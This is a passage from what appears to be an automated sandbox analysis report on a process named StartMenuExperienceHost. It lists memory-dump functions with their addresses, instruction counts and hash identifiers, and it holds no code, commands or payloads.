                                                          • Opcode ID: 0c7692a6bc1bc8883b9b5ca80087f03c2993102d5c3c2827612ab11a0629d3fb
                                                          • Instruction ID: da0c7a57a78a3a14496c22b59168318ac425602d0cb9c6912d59dfa9cf64b222
                                                          • Opcode Fuzzy Hash: 0c7692a6bc1bc8883b9b5ca80087f03c2993102d5c3c2827612ab11a0629d3fb
                                                          • Instruction Fuzzy Hash: ECC04C15F1DD1ECAF36A7654443167D14425B94714F954274E01F96BDECD1C6E021287
                                                          Function 00007FFD9B7606D0 Relevance: .0, Instructions: 8COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001D.00000002.1852908237.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_29_2_7ffd9b760000_StartMenuExperienceHost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 8a38f57ed639fef3d88d11df78701187595349350ded237a282492a867519792
                                                          • Instruction ID: 9954da747b3cbc66ae4111696fbf3128a3121ce625bc8014a52c081f31b1a927
                                                          • Opcode Fuzzy Hash: 8a38f57ed639fef3d88d11df78701187595349350ded237a282492a867519792
                                                          • Instruction Fuzzy Hash: 7AB01200D67A0F44E42C31FA0C930A570405B45110FC20271D40C401B5988D12D40243
                                                          Function 00007FFD9B762279 Relevance: .0, Instructions: 6COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001D.00000002.1852908237.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_29_2_7ffd9b760000_StartMenuExperienceHost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a356a445c7444da277418655de0d64a20d14b7fd259fe8e1dcec3ab04cc465c1
                                                          • Instruction ID: 40b2424d629d52a5a1b661e9f1945f0f4cbe76ec9a5c50cdff945eeebb00e634
                                                          • Opcode Fuzzy Hash: a356a445c7444da277418655de0d64a20d14b7fd259fe8e1dcec3ab04cc465c1
                                                          • Instruction Fuzzy Hash: 2AB09226E1A31D8AE32892A0C4A02FE31520F54310F5AC6B2900F264F59C282B85A682

                                                          Non-executed Functions

                                                          Function 00007FFD9B7609B0 Relevance: 5.2, Strings: 4, Instructions: 183COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000001D.00000002.1852908237.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_29_2_7ffd9b760000_StartMenuExperienceHost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: c9$!k9$"s9$#{9
                                                          • API String ID: 0-1692736845
                                                          • Opcode ID: 7d3d3813d2832680f919a1eb8dad22e046d9d882407aec6603a8ea0be96761e5
                                                          • Instruction ID: 64c247a061f9dbaf3eeeec25e4f953c5262b04e3ca876d3ee7696a10906bc4ce
                                                          • Opcode Fuzzy Hash: 7d3d3813d2832680f919a1eb8dad22e046d9d882407aec6603a8ea0be96761e5
                                                          • Instruction Fuzzy Hash: B441DE0FB8D5274DE21932FD71619FC6B469FA1278B0846B7F16ECD0DB8E08248586E5

                                                          Executed Functions

                                                          Function 00007FFD9B770D47 Relevance: 1.5, Strings: 1, Instructions: 269COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000001E.00000002.1875074652.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_30_2_7ffd9b770000_StartMenuExperienceHost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 5Z_H
                                                          • API String ID: 0-3267294416
                                                          • Opcode ID: 9de76dea40c15702399c8b5c59ebcbc032fd523d5972b2b00d050889ad38f47c
                                                          • Instruction ID: 5ce829ab62d2184d8c1bf17ea4675ce1a157c13d7e6c4ac93cbfa497a457c18d
                                                          • Opcode Fuzzy Hash: 9de76dea40c15702399c8b5c59ebcbc032fd523d5972b2b00d050889ad38f47c
                                                          • Instruction Fuzzy Hash: 3E91F275A19A8D4FEB98EF688879BA97FE1FB55700F4001BAD049C72E2DBB82450C740
                                                          Function 00007FFD9B7A1311 Relevance: 1.3, Strings: 1, Instructions: 51COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000001E.00000002.1875074652.00007FFD9B7A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7A1000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_30_2_7ffd9b7a1000_StartMenuExperienceHost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: M
                                                          • API String ID: 0-3664761504
                                                          • Opcode ID: 476178f37ae1bea8007af682884875244573fb68b39f68da14e6977ae0882dad
                                                          • Instruction ID: c86f1cdac484f012f81a478166e0808475115ba218a711a1fe540ab6b94d0e2a
                                                          • Opcode Fuzzy Hash: 476178f37ae1bea8007af682884875244573fb68b39f68da14e6977ae0882dad
                                                          • Instruction Fuzzy Hash: F7016D61A0F7D54FDB17A7794869814BFA0EE2720074A42EFC086CF5B3D91D998AC712
                                                          Function 00007FFD9B795F19 Relevance: 1.3, Strings: 1, Instructions: 26COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000001E.00000002.1875074652.00007FFD9B794000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B794000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_30_2_7ffd9b794000_StartMenuExperienceHost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: M
                                                          • API String ID: 0-3664761504
                                                          • Opcode ID: 3979902373c0a1fcf1f291bc18b232520b512370ca61012c08393db8498f2fc2
                                                          • Instruction ID: 23e0665c226d2958086f3fd4e66f3c8825bddb07de59d7a92fffb2c8c0b05964
                                                          • Opcode Fuzzy Hash: 3979902373c0a1fcf1f291bc18b232520b512370ca61012c08393db8498f2fc2
                                                          • Instruction Fuzzy Hash: DEE09B7160E7C44FC716DA344869454BFA0EF6721174A45EEC086CF1E3DA1DC845CB01
                                                          Function 00007FFD9B7AAF19 Relevance: 1.3, Strings: 1, Instructions: 25COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000001E.00000002.1875074652.00007FFD9B7A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7A1000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_30_2_7ffd9b7a1000_StartMenuExperienceHost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: I
                                                          • API String ID: 0-3707901625
                                                          • Opcode ID: a601ba45e11bd028dfe6945d9782090a0b6c25ad3611e8903cc506a26479f4ea
                                                          • Instruction ID: 949df4d2ec8d57390eb6d33d7c6010c4ac53f9e872fe1783e1fd06749492a4cb
                                                          • Opcode Fuzzy Hash: a601ba45e11bd028dfe6945d9782090a0b6c25ad3611e8903cc506a26479f4ea
                                                          • Instruction Fuzzy Hash: 65E0126154F3C44FCB569B74887A8443F60EF6721074B41DEC045CF5B3E61D9949C701
                                                          Function 00007FFD9B7997E9 Relevance: 1.3, Strings: 1, Instructions: 22COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000001E.00000002.1875074652.00007FFD9B794000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B794000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_30_2_7ffd9b794000_StartMenuExperienceHost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: I
                                                          • API String ID: 0-3707901625
                                                          • Opcode ID: 04f18f05d9fb48cc6d62cb92d2f95bf270d9ff6ab87a06656ff0055788e700af
                                                          • Instruction ID: 5ee6741c161f4d66bddef49e1ef72f72065c11ebff3b5434dd81394eaface95f
                                                          • Opcode Fuzzy Hash: 04f18f05d9fb48cc6d62cb92d2f95bf270d9ff6ab87a06656ff0055788e700af
                                                          • Instruction Fuzzy Hash: A3E01A7194F7C44FCB16EB74886A8547FA1AF6B21078B41EEC085CF1B3EA2D8849C701
                                                          Function 00007FFD9B799999 Relevance: 1.3, Strings: 1, Instructions: 22COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000001E.00000002.1875074652.00007FFD9B794000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B794000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_30_2_7ffd9b794000_StartMenuExperienceHost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: I
                                                          • API String ID: 0-3707901625
                                                          • Opcode ID: e14227c30450a3479c418f0d84d6433a24b4f8b29c562e1a911aeaee2bb45c4f
                                                          • Instruction ID: 3afe5fc9fee77d0a9222429a39457d0c757d971e32ff8d6a6632682a4dd2112d
                                                          • Opcode Fuzzy Hash: e14227c30450a3479c418f0d84d6433a24b4f8b29c562e1a911aeaee2bb45c4f
                                                          • Instruction Fuzzy Hash: 7FE04F7054A3C04FCB16EB7484698457FB0EE6721078B41EEC04ACB1B3E62D894ACB01
                                                          Function 00007FFD9B7AD394 Relevance: .4, Instructions: 404COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001E.00000002.1875074652.00007FFD9B7A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7A1000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_30_2_7ffd9b7a1000_StartMenuExperienceHost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a4161f682c2e3cca56ee1a65052ea8dd1e73e6ab5f9ad1c12f6e32601bcaf656
                                                          • Instruction ID: 3e57588cdedb5aecfe809e76f55abd33f3fabf52596473f1fd077a2a6ba20d4f
                                                          • Opcode Fuzzy Hash: a4161f682c2e3cca56ee1a65052ea8dd1e73e6ab5f9ad1c12f6e32601bcaf656
                                                          • Instruction Fuzzy Hash: B4D0C74194F6D54ED75666B94DB24A03FA05F17140BCE01F2D4888F1F3D44D6658C372
                                                          Function 00007FFD9B7999D1 Relevance: .3, Instructions: 309COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001E.00000002.1875074652.00007FFD9B794000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B794000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_30_2_7ffd9b794000_StartMenuExperienceHost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b19e6e9192ea667cead27c85d184395ceeb0a3b1f58154cdae3a60af723aba85
                                                          • Instruction ID: e0808258af1712664c1cb4e6057beb5c87b34e91b379dd941dd787456d45e4a6
                                                          • Opcode Fuzzy Hash: b19e6e9192ea667cead27c85d184395ceeb0a3b1f58154cdae3a60af723aba85
                                                          • Instruction Fuzzy Hash: D7A18530B1994D4FEB58EF68C4A9AB977E2FF58304B5106B9D01EC72E6DF28A841C741
                                                          Function 00007FFD9B770908 Relevance: .1, Instructions: 118COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001E.00000002.1875074652.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_30_2_7ffd9b770000_StartMenuExperienceHost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: dfa560b8674232b036245963f28da186a8f4c138d6b1b6fd382aa6a4ebc34706
                                                          • Instruction ID: e6c8b523e4bbb407a6bca34ae7c78c926a5b7a94366618befe5ad6171f87d8e9
                                                          • Opcode Fuzzy Hash: dfa560b8674232b036245963f28da186a8f4c138d6b1b6fd382aa6a4ebc34706
                                                          • Instruction Fuzzy Hash: AD21073130DD184FE768EA4CE88ADB973D5EF9932130101BAE58EC7136E951EC8287C1
                                                          Function 00007FFD9B770998 Relevance: .1, Instructions: 95COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001E.00000002.1875074652.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_30_2_7ffd9b770000_StartMenuExperienceHost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 742a6e21e90d08fe4367e2897de82405663e1170ae0465a76ff8632a427414ad
                                                          • Instruction ID: c3fbcc2f05542cd0865839609e5a6a57379443b5eec0b0920128561c90536ffb
                                                          • Opcode Fuzzy Hash: 742a6e21e90d08fe4367e2897de82405663e1170ae0465a76ff8632a427414ad
                                                          • Instruction Fuzzy Hash: 1621D620B1DE5D0FE798FA6C94BEA7977C2EB99311B4101B9E80EC32F6DD54AC418285
                                                          Function 00007FFD9B7A2AE2 Relevance: .1, Instructions: 93COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001E.00000002.1875074652.00007FFD9B7A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7A1000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_30_2_7ffd9b7a1000_StartMenuExperienceHost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 842137b7ab4d6da4f3e07cfac0bb8a7bc72fb7f74252c5d87b4cba03eb6e7e05
                                                          • Instruction ID: 1477255e677e7e6ba0622864763af0f04a6245a4503aa805b91f1581a197bc87
                                                          • Opcode Fuzzy Hash: 842137b7ab4d6da4f3e07cfac0bb8a7bc72fb7f74252c5d87b4cba03eb6e7e05
                                                          • Instruction Fuzzy Hash: 18319321B4EB8E4FE7A9ABE448A96B97792EF45300F4502BAD84DC21F3DD2879448341
                                                          Function 00007FFD9B77116D Relevance: .1, Instructions: 87COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001E.00000002.1875074652.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_30_2_7ffd9b770000_StartMenuExperienceHost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c367cd8f4524cfe6772b6e8831293d894b209fcabce3df0de0ad0e1b8d47ce6f
                                                          • Instruction ID: 8357165104af68cd069f737e7dd87d55c0135ac4ac55f62979154f4d2b72d1c5
                                                          • Opcode Fuzzy Hash: c367cd8f4524cfe6772b6e8831293d894b209fcabce3df0de0ad0e1b8d47ce6f
                                                          • Instruction Fuzzy Hash: 4C316430A1964D8FDB45EBA4C8A5DB977F0FF59300F0546BAD409DB1B2DB78A540CB50
                                                          Function 00007FFD9B770C25 Relevance: .1, Instructions: 78COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001E.00000002.1875074652.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_30_2_7ffd9b770000_StartMenuExperienceHost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 40eaf147706e28d8ead0f634e80c5140567b46176c4b6dc2e28afe18205d7384
                                                          • Instruction ID: 6b6f7f2d33f712d1600854e3e70edd5b53cc3f95b4c7759af14f55c2f7695078
                                                          • Opcode Fuzzy Hash: 40eaf147706e28d8ead0f634e80c5140567b46176c4b6dc2e28afe18205d7384
                                                          • Instruction Fuzzy Hash: BC21A575A0D78D8FEB21DBA888A92EC7FA0EF52314F1646BBD044CB1E2DA7426458741
                                                          Function 00007FFD9B774C28 Relevance: .1, Instructions: 72COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001E.00000002.1875074652.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_30_2_7ffd9b770000_StartMenuExperienceHost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 76da49c2aa001fdcb0aaa8d6f4a2044e05ac30993e78f7bd20c47889fdd9d1cc
                                                          • Instruction ID: 580de899b3560bcb4d6dcb0b1066e6f3969de108e41c19e92ddba1c0cd3961c2
                                                          • Opcode Fuzzy Hash: 76da49c2aa001fdcb0aaa8d6f4a2044e05ac30993e78f7bd20c47889fdd9d1cc
                                                          • Instruction Fuzzy Hash: 83215E21B1961E4FEBB4E75888B96BC7392FF85310F1602B9E44ED72F2DE686E414740
                                                          Function 00007FFD9B772BF9 Relevance: .1, Instructions: 62COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001E.00000002.1875074652.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_30_2_7ffd9b770000_StartMenuExperienceHost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 2899737fc1437a349c1b773400877f16d9aff1b87446b6a10630ef02bf77d1c3
                                                          • Instruction ID: ed8b81fbfc454544aa41c52268ed6d05ff75d7c6ebc28302cd610b20c8d74c36
                                                          • Opcode Fuzzy Hash: 2899737fc1437a349c1b773400877f16d9aff1b87446b6a10630ef02bf77d1c3
                                                          • Instruction Fuzzy Hash: 09115730A09A0D8FDB54DF48C494BA973E1FB69300F5142B9D04ED32B5DB74AA808B45
                                                          Function 00007FFD9B774D1E Relevance: .1, Instructions: 61COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001E.00000002.1875074652.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_30_2_7ffd9b770000_StartMenuExperienceHost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d79fdf0a7b5e6cff03ce654eadb70af180b103078c32ae522b5c1918063004eb
                                                          • Instruction ID: 09f0ff9b15e4b03062e7ceaec1572c5066ce170f4539b37138cfa917da02ec6b
                                                          • Opcode Fuzzy Hash: d79fdf0a7b5e6cff03ce654eadb70af180b103078c32ae522b5c1918063004eb
                                                          • Instruction Fuzzy Hash: 4A110321B0960D4BEFA4E66884E9ABC73D2EF94740F1605BDD54EC72F2DD786A418604
                                                          Function 00007FFD9B770C38 Relevance: .1, Instructions: 51COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001E.00000002.1875074652.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_30_2_7ffd9b770000_StartMenuExperienceHost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e19204ac95bd02888abdea4ea6a6191eb78db131177b2ac76db2b69c5368b821
                                                          • Instruction ID: c8df8ecfbcff56499c6b97853aa873acc4ffdb6f1501b033612ed46d14a9e47d
                                                          • Opcode Fuzzy Hash: e19204ac95bd02888abdea4ea6a6191eb78db131177b2ac76db2b69c5368b821
                                                          • Instruction Fuzzy Hash: CF117035A0D78D8FEB12DBA898A92DCBFA0EF52214F1646B7C084DB1E2E57416498781
                                                          Function 00007FFD9B7A7438 Relevance: .0, Instructions: 47COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001E.00000002.1875074652.00007FFD9B7A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7A1000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_30_2_7ffd9b7a1000_StartMenuExperienceHost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 38ce4ba2af7cef3c04b544350a889a9b92410f2bfbb59a38f57e296b725be526
                                                          • Instruction ID: 6a15c683ce2930e4f73db21de7f88e1dca324e4ba130fae884956e11d9e56f46
                                                          • Opcode Fuzzy Hash: 38ce4ba2af7cef3c04b544350a889a9b92410f2bfbb59a38f57e296b725be526
                                                          • Instruction Fuzzy Hash: FCF0F42BA4C2914ED709B67C74A28F87B519F1223970881FBE09E8E4E7CD1994858684
                                                          Function 00007FFD9B79CA56 Relevance: .0, Instructions: 45COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001E.00000002.1875074652.00007FFD9B794000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B794000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_30_2_7ffd9b794000_StartMenuExperienceHost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 907434b3550ffdfebb1013bdc3b3dd23ef2e9ff4fa53a2a6dc2b2ede005dfa3e
                                                          • Instruction ID: 4ca2ef22c3e0674f3c0651991573c61e3d859df808463586b6e0e7a55980d459
                                                          • Opcode Fuzzy Hash: 907434b3550ffdfebb1013bdc3b3dd23ef2e9ff4fa53a2a6dc2b2ede005dfa3e
                                                          • Instruction Fuzzy Hash: E7019675A1DB888FD7A4DF18844572AB7E2FBA8315F114A2EE09DD3660DB30A8018B42
                                                          Function 00007FFD9B770C40 Relevance: .0, Instructions: 45COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001E.00000002.1875074652.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_30_2_7ffd9b770000_StartMenuExperienceHost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 56f46b79cf64b9e6aef23dadac72c4ce997f4aa46cd70d3c1cad83f03af645b0
                                                          • Instruction ID: 3f2f2090d8da6a43d7965b5c4eba903661569b89c21e4bc6bec3c5e4b9ab60da
                                                          • Opcode Fuzzy Hash: 56f46b79cf64b9e6aef23dadac72c4ce997f4aa46cd70d3c1cad83f03af645b0
                                                          • Instruction Fuzzy Hash: 3E01A135A0D7888FEB12DB6888A41DCBFB0EF42314F0646F7C084DB1E2D57416488780
                                                          Function 00007FFD9B774CE3 Relevance: .0, Instructions: 37COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001E.00000002.1875074652.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_30_2_7ffd9b770000_StartMenuExperienceHost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5554ce8cfa5bda4a09edcef3f4ce8531ce752d1f95435721850e8c5bd83630bd
                                                          • Instruction ID: d0d5c5319233750a9222b99b807a0cf5343c0adfe0f6c11f1a1e700c5e5f32cb
                                                          • Opcode Fuzzy Hash: 5554ce8cfa5bda4a09edcef3f4ce8531ce752d1f95435721850e8c5bd83630bd
                                                          • Instruction Fuzzy Hash: 87F03130B1951E8EEB64EA54D8E9AFC73A1FF54311F1602FDD10ED32B2DD786A818A04
                                                          Function 00007FFD9B770C50 Relevance: .0, Instructions: 34COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001E.00000002.1875074652.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_30_2_7ffd9b770000_StartMenuExperienceHost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 26eefe597a17be193e35cf7a9f013773529d44204a5abc2d6f5942d680988026
                                                          • Instruction ID: bc7429274e4d1f7fc1d46d0c93eb6e78eaa8e5b774edbf18953fa296aae15a2f
                                                          • Opcode Fuzzy Hash: 26eefe597a17be193e35cf7a9f013773529d44204a5abc2d6f5942d680988026
                                                          • Instruction Fuzzy Hash: 59018434A0D3898FEB12DB6484941DDBFF0EF02314F1542E7C444CB1A2D9745B44C741
                                                          Function 00007FFD9B7A37A9 Relevance: .0, Instructions: 29COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001E.00000002.1875074652.00007FFD9B7A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7A1000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_30_2_7ffd9b7a1000_StartMenuExperienceHost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 469b407ab196c303f19a15199dfce49a530dd37f2a3405873e931f1e64c9c08c
                                                          • Instruction ID: b7e16339d14feb88cee687b06369b84eef3cd2fa311b05f1dcc8cdeacf9c9b9a
                                                          • Opcode Fuzzy Hash: 469b407ab196c303f19a15199dfce49a530dd37f2a3405873e931f1e64c9c08c
                                                          • Instruction Fuzzy Hash: 93E09220B09BC84FCB0E963948685607FA1EF6711178942EBC445CF1A3ED19DC88C751
                                                          Function 00007FFD9B77560A Relevance: .0, Instructions: 27COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001E.00000002.1875074652.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_30_2_7ffd9b770000_StartMenuExperienceHost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ec35e2213699fc7d56f5bcb80efc954be6a810b370defc750019ec56b6c61d1e
                                                          • Instruction ID: 8272ee44d0b82c16a65333f4ad0edade07e14b0f4f67f034a193085c366d0064
                                                          • Opcode Fuzzy Hash: ec35e2213699fc7d56f5bcb80efc954be6a810b370defc750019ec56b6c61d1e
                                                          • Instruction Fuzzy Hash: 0EF08930A0920647F7509684C4A17E9B394EF84310F124279E90E977E2DD7C6E85CB45
                                                          Function 00007FFD9B7ADE68 Relevance: .0, Instructions: 23COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001E.00000002.1875074652.00007FFD9B7A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7A1000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_30_2_7ffd9b7a1000_StartMenuExperienceHost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: fa4ebea491e3ee0e57ac86c1e53363385212026cab51c54581ada644874dec9e
                                                          • Instruction ID: ebd9baa5999e675c6b0894c412fe5489da9d88945f0e9211f8a4172c53216b58
                                                          • Opcode Fuzzy Hash: fa4ebea491e3ee0e57ac86c1e53363385212026cab51c54581ada644874dec9e
                                                          • Instruction Fuzzy Hash: 52E04F3068D7C04FC70A973488698503FB1EF5B11178A80EFC045CF1B3D61D9849C712
                                                          Function 00007FFD9B7A9439 Relevance: .0, Instructions: 21COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001E.00000002.1875074652.00007FFD9B7A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7A1000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_30_2_7ffd9b7a1000_StartMenuExperienceHost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 2616f3d5d680fddf4f54cde58e32ac6e0f6652a735a4c651a215ec23fbc13fb2
                                                          • Instruction ID: 13b87aa1d2ee3728858043c1b200c0e000b8a1b1fc6cee3974ed2013a7b60abd
                                                          • Opcode Fuzzy Hash: 2616f3d5d680fddf4f54cde58e32ac6e0f6652a735a4c651a215ec23fbc13fb2
                                                          • Instruction Fuzzy Hash: 60E0123054A7844FC70A9B2488A9D903FB0EF2B21178A01E7D449CF5B3D61D9C49C762
                                                          Function 00007FFD9B770B95 Relevance: .0, Instructions: 19COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001E.00000002.1875074652.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_30_2_7ffd9b770000_StartMenuExperienceHost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
